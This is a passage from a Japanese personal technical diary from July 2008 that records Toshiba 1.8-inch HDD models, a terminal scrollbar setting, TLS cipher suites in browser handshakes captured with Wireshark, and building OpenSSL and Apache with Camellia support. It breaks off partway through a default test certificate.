logo
 2003年9月 
 2003年10月 
 2003年11月 
 2003年12月 
 2004年1月  2004年7月 
 2004年2月  2004年8月 
 2004年3月  2004年9月 
 2004年4月  2004年10月 
 2004年5月  2004年11月 
 2004年6月  2004年12月 
 2005年1月  2005年7月 
 2005年2月  2005年8月 
 2005年3月  2005年9月 
 2005年4月  2005年10月 
 2005年5月  2005年11月 
 2005年6月  2005年12月 
 2006年1月  2006年7月 
 2006年2月  2006年8月 
 2006年3月  2006年9月 
 2006年4月  2006年10月 
 2006年5月  2006年11月 
 2006年6月  2006年12月 
 2007年1月  2007年7月 
 2007年2月  2007年8月 
 2007年3月  2007年9月 
 2007年4月  2007年10月 
 2007年5月  2007年11月 
 2007年6月  2007年12月 
 2008年1月 
 2008年2月 
 2008年3月 
 2008年4月 
 2008年5月 
 2008年6月 
アイコンの説明
code:Haemophilus influenzae
ここに書かれていることは無保証です。同じことを行って問題が発生しても、 龍義は責任をとりません。

 7/1
Other
1年前に東芝の 1.8 インチ HDD を調べたのだけど、ちょうど1年経ったので、
また調べてみることにした。
 20G30G40G60G80G100G120G160G
5mm厚MK2004GAL
MK2006GAL
MK3006GALMK4007GAL
8mm厚MK2003GAH
MK2004GAH
MK2006GAH
MK3004GAHMK4004GAH
MK4006GAH
MK6006GAHMK8007GAH
5mm厚ZIFMK2008GALMK3008GALMK4009GAL
8mm厚ZIFMK4008GAHMK6008GAHMK8009GAH
5mm厚LIFMK6028GALMK8025GAL
8mm厚LIFMK1011GAHMK1214GAH
5mm厚MSATA
8mm厚MSATAMK8016GSG
MK8017GSG
MK1216GSGMK1617GSG
東芝のページにある MK8016GAS というのは、TYPO なんでしょう。それにしても、 1年で8つほど増えてることを考えると、時代が進むのは早いな、なんて感じる。 7/2 Network screen だとスクロールバーが使えなくなってしまう、と先月書いた気がしたの だけど(書いてなかった…)、Poderosa の設定でスクロールバーがちゃんと使える ことがわかった。[ツール]→[オプション]→[ターミナル] の設定にある アプリケーションモードでもスクロールを許可する というのにチェックを入れるだけ。これで screen を使っていてもスクロールバーを 使えるようになった。今のところ、他に影響が出てないし、便利になった。 7/3 Network WWW wireshark 0.99.6a を使っていて Firefox 2.0.0.15 の https 通信を眺めていたの だけど、Client Hello で。 Cipher Suites (28 suites) Cipher Suite: Unknown (0xc00a) Cipher Suite: Unknown (0xc014) Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039) Cipher Suite: TLS_DHE_DSS_WITH_AES_256_CBC_SHA (0x0038) Cipher Suite: Unknown (0xc00f) Cipher Suite: Unknown (0xc005) Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA (0x0035) Cipher Suite: Unknown (0xc007) Cipher Suite: Unknown (0xc009) Cipher Suite: Unknown (0xc011) Cipher Suite: Unknown (0xc013) Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033) Cipher Suite: TLS_DHE_DSS_WITH_AES_128_CBC_SHA (0x0032) Cipher Suite: Unknown (0xc00c) Cipher Suite: Unknown (0xc00e) Cipher Suite: Unknown (0xc002) Cipher Suite: Unknown (0xc004) Cipher Suite: TLS_RSA_WITH_RC4_128_MD5 (0x0004) Cipher Suite: TLS_RSA_WITH_RC4_128_SHA (0x0005) Cipher Suite: TLS_RSA_WITH_AES_128_CBC_SHA (0x002f) Cipher Suite: Unknown (0xc008) Cipher Suite: Unknown (0xc012) Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA (0x0016) Cipher Suite: TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA (0x0013) Cipher Suite: Unknown (0xc00d) Cipher Suite: Unknown (0xc003) Cipher Suite: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA (0xfeff) Cipher Suite: TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a) な感じで Unknown だらけ。そんな古い wireshark じゃないのにな、と思いながら とりあえず、wireshark 1.0.1 にしてみた。 Cipher Suites (28 suites) Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a) Cipher Suite: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014) Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039) Cipher Suite: TLS_DHE_DSS_WITH_AES_256_CBC_SHA (0x0038) Cipher Suite: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA (0xc00f) Cipher Suite: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA (0xc005) Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA (0x0035) Cipher Suite: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA (0xc007) Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (0xc009) Cipher Suite: TLS_ECDHE_RSA_WITH_RC4_128_SHA (0xc011) Cipher Suite: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013) Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033) Cipher Suite: TLS_DHE_DSS_WITH_AES_128_CBC_SHA (0x0032) Cipher Suite: TLS_ECDH_RSA_WITH_RC4_128_SHA (0xc00c) Cipher Suite: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA (0xc00e) Cipher Suite: TLS_ECDH_ECDSA_WITH_RC4_128_SHA (0xc002) Cipher Suite: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA (0xc004) Cipher Suite: TLS_RSA_WITH_RC4_128_MD5 (0x0004) Cipher Suite: TLS_RSA_WITH_RC4_128_SHA (0x0005) Cipher Suite: TLS_RSA_WITH_AES_128_CBC_SHA (0x002f) Cipher Suite: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (0xc008) Cipher Suite: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (0xc012) Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA (0x0016) Cipher Suite: TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA (0x0013) Cipher Suite: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA (0xc00d) Cipher Suite: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA (0xc003) Cipher Suite: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA (0xfeff) Cipher Suite: TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a) となる。RFC4492 周りのがちゃんと表示されるようになった。が、しかし、何で ECC 暗号の要求が半分以上なんだ?Firefox は。別に問題ないけど、対応している Apache ってそんなに無い気がする。 7/4 Network WWW 昨日のついでに IE7 / Opera の Cipher Suite を見てみた。IE7 (7.0.5730.13) のデフォルトでは。 Cipher Suites (11 suites) Cipher Suite: TLS_RSA_WITH_RC4_128_MD5 (0x0004) Cipher Suite: TLS_RSA_WITH_RC4_128_SHA (0x0005) Cipher Suite: TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a) Cipher Suite: TLS_RSA_WITH_DES_CBC_SHA (0x0009) Cipher Suite: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA (0x0064) Cipher Suite: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA (0x0062) Cipher Suite: TLS_RSA_EXPORT_WITH_RC4_40_MD5 (0x0003) Cipher Suite: TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 (0x0006) Cipher Suite: TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA (0x0013) Cipher Suite: TLS_DHE_DSS_WITH_DES_CBC_SHA (0x0012) Cipher Suite: TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA (0x0063) Opera 9.51 のデフォルトでは。 Cipher Suites (17 suites) Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039) Cipher Suite: TLS_DHE_DSS_WITH_AES_256_CBC_SHA (0x0038) Cipher Suite: TLS_DH_RSA_WITH_AES_256_CBC_SHA (0x0037) Cipher Suite: TLS_DH_DSS_WITH_AES_256_CBC_SHA (0x0036) Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA (0x0035) Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033) Cipher Suite: TLS_DHE_DSS_WITH_AES_128_CBC_SHA (0x0032) Cipher Suite: TLS_DH_RSA_WITH_AES_128_CBC_SHA (0x0031) Cipher Suite: TLS_DH_DSS_WITH_AES_128_CBC_SHA (0x0030) Cipher Suite: TLS_RSA_WITH_AES_128_CBC_SHA (0x002f) Cipher Suite: TLS_RSA_WITH_RC4_128_SHA (0x0005) Cipher Suite: TLS_RSA_WITH_RC4_128_MD5 (0x0004) Cipher Suite: TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA (0x0013) Cipher Suite: TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA (0x000d) Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA (0x0016) Cipher Suite: TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA (0x0010) Cipher Suite: TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a) Opera では TLS 1.1 対応、みたいに書いてあったのだけど、Client Hello を 見てみると、 Version: TLS 1.0 (0x0301) なんだよなぁ。どうやったら TLS 1.1 になるんだろうか。 7/5 Network WWW 昨日の続き。Opera で何度かアクセスすると、TLS 1.1 のパケットが出てきた。 Secure Socket Layer TLSv1 Record Layer: Handshake Protocol: Client Hello Content Type: Handshake (22) Version: TLS 1.0 (0x0301) Length: 113 Handshake Protocol: Client Hello Handshake Type: Client Hello (1) Length: 109 Version: TLS 1.1 (0x0302) Random こんな感じ。Client Hello の Cipher Suite は同じものを投げているみたい。 wget / curl / openssl s_client 辺りで、TLS 1.1 を対応してくれると、非常に 楽なんだけどなぁ。 7/6 Network WWW ものはついでなんで、openssl を最新の 0.9.8h にして、CAMELLIA や SEED を 組み込んでみた。 [toyota@dstar]% tar xvfz openssl-0.9.8h.tar.gz [toyota@dstar]% cd openssl-0.9.8h [toyota@dstar]% ./config enable-krb5 enable-camellia enable-seed enable-idea [toyota@dstar]% make 無事通ったみたいなので、テストしてみる。 [toyota@dstar]% ./apps/openssl ciphers -v DHE-RSA-AES256-SHA SSLv3 Kx=DH Au=RSA Enc=AES(256) Mac=SHA1 DHE-DSS-AES256-SHA SSLv3 Kx=DH Au=DSS Enc=AES(256) Mac=SHA1 AES256-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(256) Mac=SHA1 DHE-RSA-CAMELLIA256-SHA SSLv3 Kx=DH Au=RSA Enc=Camellia(256) Mac=SHA1 DHE-DSS-CAMELLIA256-SHA SSLv3 Kx=DH Au=DSS Enc=Camellia(256) Mac=SHA1 CAMELLIA256-SHA SSLv3 Kx=RSA Au=RSA Enc=Camellia(256) Mac=SHA1 EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH Au=RSA Enc=3DES(168) Mac=SHA1 EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH Au=DSS Enc=3DES(168) Mac=SHA1 DES-CBC3-SHA SSLv3 Kx=RSA Au=RSA Enc=3DES(168) Mac=SHA1 DES-CBC3-MD5 SSLv2 Kx=RSA Au=RSA Enc=3DES(168) Mac=MD5 DHE-RSA-AES128-SHA SSLv3 Kx=DH Au=RSA Enc=AES(128) Mac=SHA1 DHE-DSS-AES128-SHA SSLv3 Kx=DH Au=DSS Enc=AES(128) Mac=SHA1 AES128-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(128) Mac=SHA1 DHE-RSA-SEED-SHA SSLv3 Kx=DH Au=RSA Enc=SEED(128) Mac=SHA1 DHE-DSS-SEED-SHA SSLv3 Kx=DH Au=DSS Enc=SEED(128) Mac=SHA1 SEED-SHA SSLv3 Kx=RSA Au=RSA Enc=SEED(128) Mac=SHA1 DHE-RSA-CAMELLIA128-SHA SSLv3 Kx=DH Au=RSA Enc=Camellia(128) Mac=SHA1 DHE-DSS-CAMELLIA128-SHA SSLv3 Kx=DH Au=DSS Enc=Camellia(128) Mac=SHA1 CAMELLIA128-SHA SSLv3 Kx=RSA Au=RSA Enc=Camellia(128) Mac=SHA1 IDEA-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=IDEA(128) Mac=SHA1 IDEA-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=IDEA(128) Mac=MD5 RC2-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=RC2(128) Mac=MD5 RC4-SHA SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=SHA1 RC4-MD5 SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5 RC4-MD5 SSLv2 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5 EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH Au=RSA Enc=DES(56) Mac=SHA1 EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH Au=DSS Enc=DES(56) Mac=SHA1 DES-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=DES(56) Mac=SHA1 DES-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=DES(56) Mac=MD5 EXP-EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512) Au=DSS Enc=DES(40) Mac=SHA1 export EXP-DES-CBC-SHA SSLv3 Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export EXP-RC2-CBC-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export EXP-RC2-CBC-MD5 SSLv2 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export EXP-RC4-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export EXP-RC4-MD5 SSLv2 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export なんか、Kerberos5 が入ってない気がするけど、ここは見なかったことにして。 とりあえず、Camellia の要求をサーバに投げてみる。 [toyota@dstar]% ./apps/openssl s_client -tls1 -connect 192.168.0.77:443 -cipher 'CAMELLIA' CONNECTED(00000003) 24342:error:14094410:SSL routines:SSL3_READ_BYTES:sslv3 alert handshake failure :s3_pkt.c:1053:SSL alert number 40 24342:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt .c:530: ま、手元のサーバは対応してないわな。とりあえず、Cipher Suite を見てみた。 Cipher Suites (8 suites) Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA (0x0089) Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (0x0088) Cipher Suite: TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA (0x0087) Cipher Suite: TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (0x0084) Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA (0x0046) Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (0x0045) Cipher Suite: TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA (0x0044) Cipher Suite: TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (0x0041) CAMELLIA のみ。ありえないクライアントだ。で、1つ気になったことが。IIS6 に 対して CAMELLIA のみで投げてみたら。 [toyota@dstar]% ./apps/openssl s_client -tls1 -connect 192.168.0.92:443 -cipher 'CAMELLIA' CONNECTED(00000003) 24335:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt .c:530: Wireshark で見てみると、Client Hello のあと、いきなり FIN ACK を投げられて しまう。言葉通りの、理由もなしに。嫌な感じである。 7/7 Network WWW 近くにあった CentOS 5.1 の OpenSSL のバージョンを見てみた。RPM のもので、 [toyota@centos5]% openssl version OpenSSL 0.9.8b 04 May 2006 [toyota@centos5]% openssl ciphers -v DHE-RSA-AES256-SHA SSLv3 Kx=DH Au=RSA Enc=AES(256) Mac=SHA1 DHE-DSS-AES256-SHA SSLv3 Kx=DH Au=DSS Enc=AES(256) Mac=SHA1 AES256-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(256) Mac=SHA1 EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH Au=RSA Enc=3DES(168) Mac=SHA1 EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH Au=DSS Enc=3DES(168) Mac=SHA1 DES-CBC3-SHA SSLv3 Kx=RSA Au=RSA Enc=3DES(168) Mac=SHA1 DES-CBC3-MD5 SSLv2 Kx=RSA Au=RSA Enc=3DES(168) Mac=MD5 DHE-RSA-AES128-SHA SSLv3 Kx=DH Au=RSA Enc=AES(128) Mac=SHA1 DHE-DSS-AES128-SHA SSLv3 Kx=DH Au=DSS Enc=AES(128) Mac=SHA1 AES128-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(128) Mac=SHA1 RC2-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=RC2(128) Mac=MD5 DHE-DSS-RC4-SHA SSLv3 Kx=DH Au=DSS Enc=RC4(128) Mac=SHA1 EXP-KRB5-RC4-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(40) Mac=MD5 export EXP-KRB5-RC4-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(40) Mac=SHA1 export KRB5-RC4-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(128) Mac=MD5 KRB5-RC4-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(128) Mac=SHA1 RC4-SHA SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=SHA1 RC4-MD5 SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5 RC4-MD5 SSLv2 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5 KRB5-DES-CBC3-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=3DES(168) Mac=MD5 KRB5-DES-CBC3-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=3DES(168) Mac=SHA1 EXP1024-DHE-DSS-DES-CBC-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=DES(56) Mac=SHA1 export EXP1024-DES-CBC-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=DES(56) Mac=SHA1 export KRB5-DES-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(56) Mac=MD5 KRB5-DES-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(56) Mac=SHA1 EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH Au=RSA Enc=DES(56) Mac=SHA1 EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH Au=DSS Enc=DES(56) Mac=SHA1 DES-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=DES(56) Mac=SHA1 DES-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=DES(56) Mac=MD5 EXP1024-DHE-DSS-RC4-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=RC4(56) Mac=SHA1 export EXP1024-RC4-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=SHA1 export EXP-KRB5-RC2-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=RC2(40) Mac=MD5 export EXP-KRB5-DES-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(40) Mac=MD5 export EXP-KRB5-RC2-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=RC2(40) Mac=SHA1 export EXP-KRB5-DES-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(40) Mac=SHA1 export EXP-EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512) Au=DSS Enc=DES(40) Mac=SHA1 export EXP-DES-CBC-SHA SSLv3 Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export EXP-RC2-CBC-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export EXP-RC2-CBC-MD5 SSLv2 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export EXP-RC4-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export EXP-RC4-MD5 SSLv2 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export な感じ。Kerberos5 系がちゃんと組み込まれているみたい。CentOS 3.8 の環境に Camellia / Kerberos5 対応の最新の OpenSSL をコンパイルしてみる。 [toyota@dstar]% tar xvfz openssl-0.9.8h.tar.gz [toyota@dstar]% cd openssl-0.9.8h いろいろやってわかったことは、--with-krb5-include / --with-krb5-lib 指定に ディレクトリじゃなくて、-I や -L をつけたコンパイルオプションを指定すること、 --with-krb5-flavor は MIT / Heimdal の指定だけど、Heimdal は対応していない ということ。試しに Heimdal を指定すると。 [toyota@dstar]% ./config enable-krb5 enable-camellia enable-seed enable-idea -- with-krb5-flavor=Heimdal --with-krb5-include="-I/usr/kerberos/include" --with-k rb5-lib="-L/usr/kerberos/lib -lkrb5" Operating system: i686-whatever-linux2 Configuring for linux-elf Configuring for linux-elf no-cms [default] OPENSSL_NO_CMS (skip dir) no-gmp [default] OPENSSL_NO_GMP (skip dir) no-mdc2 [default] OPENSSL_NO_MDC2 (skip dir) no-montasm [default] no-rc5 [default] OPENSSL_NO_RC5 (skip dir) no-rfc3779 [default] OPENSSL_NO_RFC3779 (skip dir) no-shared [default] no-tlsext [default] OPENSSL_NO_TLSEXT (skip dir) no-zlib [default] no-zlib-dynamic [default] IsMK1MF=0 Sorry, Heimdal is currently not supported となる。結局。 [toyota@dstar]% ./config enable-krb5 enable-camellia enable-seed enable-rc5 ena ble-idea --with-krb5-flavor=MIT --with-krb5-include="-I/usr/kerberos/include" - -with-krb5-lib="-L/usr/kerberos/lib -lkrb5" [toyota@dstar]% make [toyota@dstar]% ./apps/openssl ciphers -v DHE-RSA-AES256-SHA SSLv3 Kx=DH Au=RSA Enc=AES(256) Mac=SHA1 DHE-DSS-AES256-SHA SSLv3 Kx=DH Au=DSS Enc=AES(256) Mac=SHA1 AES256-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(256) Mac=SHA1 DHE-RSA-CAMELLIA256-SHA SSLv3 Kx=DH Au=RSA Enc=Camellia(256) Mac=SHA1 DHE-DSS-CAMELLIA256-SHA SSLv3 Kx=DH Au=DSS Enc=Camellia(256) Mac=SHA1 CAMELLIA256-SHA SSLv3 Kx=RSA Au=RSA Enc=Camellia(256) Mac=SHA1 KRB5-DES-CBC3-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=3DES(168) Mac=MD5 KRB5-DES-CBC3-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=3DES(168) Mac=SHA1 EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH Au=RSA Enc=3DES(168) Mac=SHA1 EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH Au=DSS Enc=3DES(168) Mac=SHA1 DES-CBC3-SHA SSLv3 Kx=RSA Au=RSA Enc=3DES(168) Mac=SHA1 DES-CBC3-MD5 SSLv2 Kx=RSA Au=RSA Enc=3DES(168) Mac=MD5 DHE-RSA-AES128-SHA SSLv3 Kx=DH Au=RSA Enc=AES(128) Mac=SHA1 DHE-DSS-AES128-SHA SSLv3 Kx=DH Au=DSS Enc=AES(128) Mac=SHA1 AES128-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(128) Mac=SHA1 DHE-RSA-SEED-SHA SSLv3 Kx=DH Au=RSA Enc=SEED(128) Mac=SHA1 DHE-DSS-SEED-SHA SSLv3 Kx=DH Au=DSS Enc=SEED(128) Mac=SHA1 SEED-SHA SSLv3 Kx=RSA Au=RSA Enc=SEED(128) Mac=SHA1 DHE-RSA-CAMELLIA128-SHA SSLv3 Kx=DH Au=RSA Enc=Camellia(128) Mac=SHA1 DHE-DSS-CAMELLIA128-SHA SSLv3 Kx=DH Au=DSS Enc=Camellia(128) Mac=SHA1 CAMELLIA128-SHA SSLv3 Kx=RSA Au=RSA Enc=Camellia(128) Mac=SHA1 KRB5-IDEA-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=IDEA(128) Mac=MD5 KRB5-IDEA-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=IDEA(128) Mac=SHA1 IDEA-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=IDEA(128) Mac=SHA1 IDEA-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=IDEA(128) Mac=MD5 RC2-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=RC2(128) Mac=MD5 KRB5-RC4-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(128) Mac=MD5 KRB5-RC4-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(128) Mac=SHA1 RC4-SHA SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=SHA1 RC4-MD5 SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5 RC4-MD5 SSLv2 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5 KRB5-DES-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(56) Mac=MD5 KRB5-DES-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(56) Mac=SHA1 EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH Au=RSA Enc=DES(56) Mac=SHA1 EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH Au=DSS Enc=DES(56) Mac=SHA1 DES-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=DES(56) Mac=SHA1 DES-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=DES(56) Mac=MD5 EXP-KRB5-RC2-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=RC2(40) Mac=MD5 export EXP-KRB5-DES-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(40) Mac=MD5 export EXP-KRB5-RC2-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=RC2(40) Mac=SHA1 export EXP-KRB5-DES-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(40) Mac=SHA1 export EXP-EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512) Au=DSS Enc=DES(40) Mac=SHA1 export EXP-DES-CBC-SHA SSLv3 Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export EXP-RC2-CBC-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export EXP-RC2-CBC-MD5 SSLv2 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export EXP-KRB5-RC4-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(40) Mac=MD5 export EXP-KRB5-RC4-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(40) Mac=SHA1 export EXP-RC4-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export EXP-RC4-MD5 SSLv2 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export と、組み込み完了。明日は、時間があれば Camellia 対応 Apache を作ってテスト してみようかな。 7/8 WWW なんか、centos5 で検索しようとして、cwntos5 と間違えて入力して検索をして しまった。出てきたページが自分のページ1件だったので、軽くショック。間違えた 綴りで書いていたことと、その間違えた綴りで書いたのは世界で私だけだったという ことと。恥ずかしいので、こっそり昔のページを直しておいた。 7/9 Network WWW OpenSSL を CAMELLIA 対応にして、Apache もコンパイルし直してみた。Apache は configure に --with-ssl の指定をしただけだけど。これで、通信をしてみた。 とりあえず、openssl コマンドを使って。 [toyota@dstar]% ./openssl s_client -connect localhost:443 -cipher 'CAMELLIA' CONNECTED(00000003) depth=0 /C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Webserver Team/C N=www.snakeoil.dom/emailAddress=www@snakeoil.dom verify error:num=20:unable to get local issuer certificate verify return:1 depth=0 /C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Webserver Team/C N=www.snakeoil.dom/emailAddress=www@snakeoil.dom verify error:num=27:certificate not trusted verify return:1 depth=0 /C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Webserver Team/C N=www.snakeoil.dom/emailAddress=www@snakeoil.dom verify error:num=21:unable to verify the first certificate verify return:1 --- Certificate chain 0 s:/C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Webserver Team/CN=w ww.snakeoil.dom/emailAddress=www@snakeoil.dom i:/C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Certificate Authori ty/CN=Snake Oil CA/emailAddress=ca@snakeoil.dom --- Server certificate -----BEGIN CERTIFICATE----- MIIDNjCCAp+gAwIBAgIBATANBgkqhkiG9w0BAQQFADCBqTELMAkGA1UEBhMCWFkx FTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25ha2UgVG93bjEXMBUG A1UEChMOU25ha2UgT2lsLCBMdGQxHjAcBgNVBAsTFUNlcnRpZmljYXRlIEF1dGhv cml0eTEVMBMGA1UEAxMMU25ha2UgT2lsIENBMR4wHAYJKoZIhvcNAQkBFg9jYUBz bmFrZW9pbC5kb20wHhcNOTkxMDIxMTgyMTUxWhcNMDExMDIwMTgyMTUxWjCBpzEL MAkGA1UEBhMCWFkxFTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25h 